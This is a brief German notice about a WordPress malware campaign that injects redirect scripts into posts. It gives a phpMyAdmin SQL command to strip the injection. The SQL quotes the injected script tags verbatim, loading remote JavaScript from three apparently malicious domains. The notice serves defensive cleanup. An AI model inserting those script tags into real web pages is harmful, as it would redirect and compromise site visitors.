Neue Malware im Umlauf! Sobald Hacker Ihr WordPress infiziert haben, sind Ihre Beiträge und Seiten mit einer Weiterleitung belegt.
Öffnen Sie phpMyAdmin und nutzen Sie folgende Vorlage, um die Malware von dest.collectfasttracks[.]com und https://track.developfirstline[.]com aus Ihrem WordPress zu entfernen (Bitte vorher ein Backup erstellen!):
Hinweis: Falls Sie ein individuelles Datenbank-Präfix haben, müssen “wp_” durch Ihr individuelles Präfix ersetzen!
UPDATE wp_posts SET post_content = REPLACE(post_content, "</script></script><script async src='https://dest.collectfasttracks.com/hjsers.js' type='text/javascript'></script><script src='https://track.developfirstline.com/t.js?s=5' type='text/javascript'></script><script src='https://blackentertainments.com/t.js?s=5' type='text/javascript'></script>", '') WHERE post_content LIKE '%</script></script>%';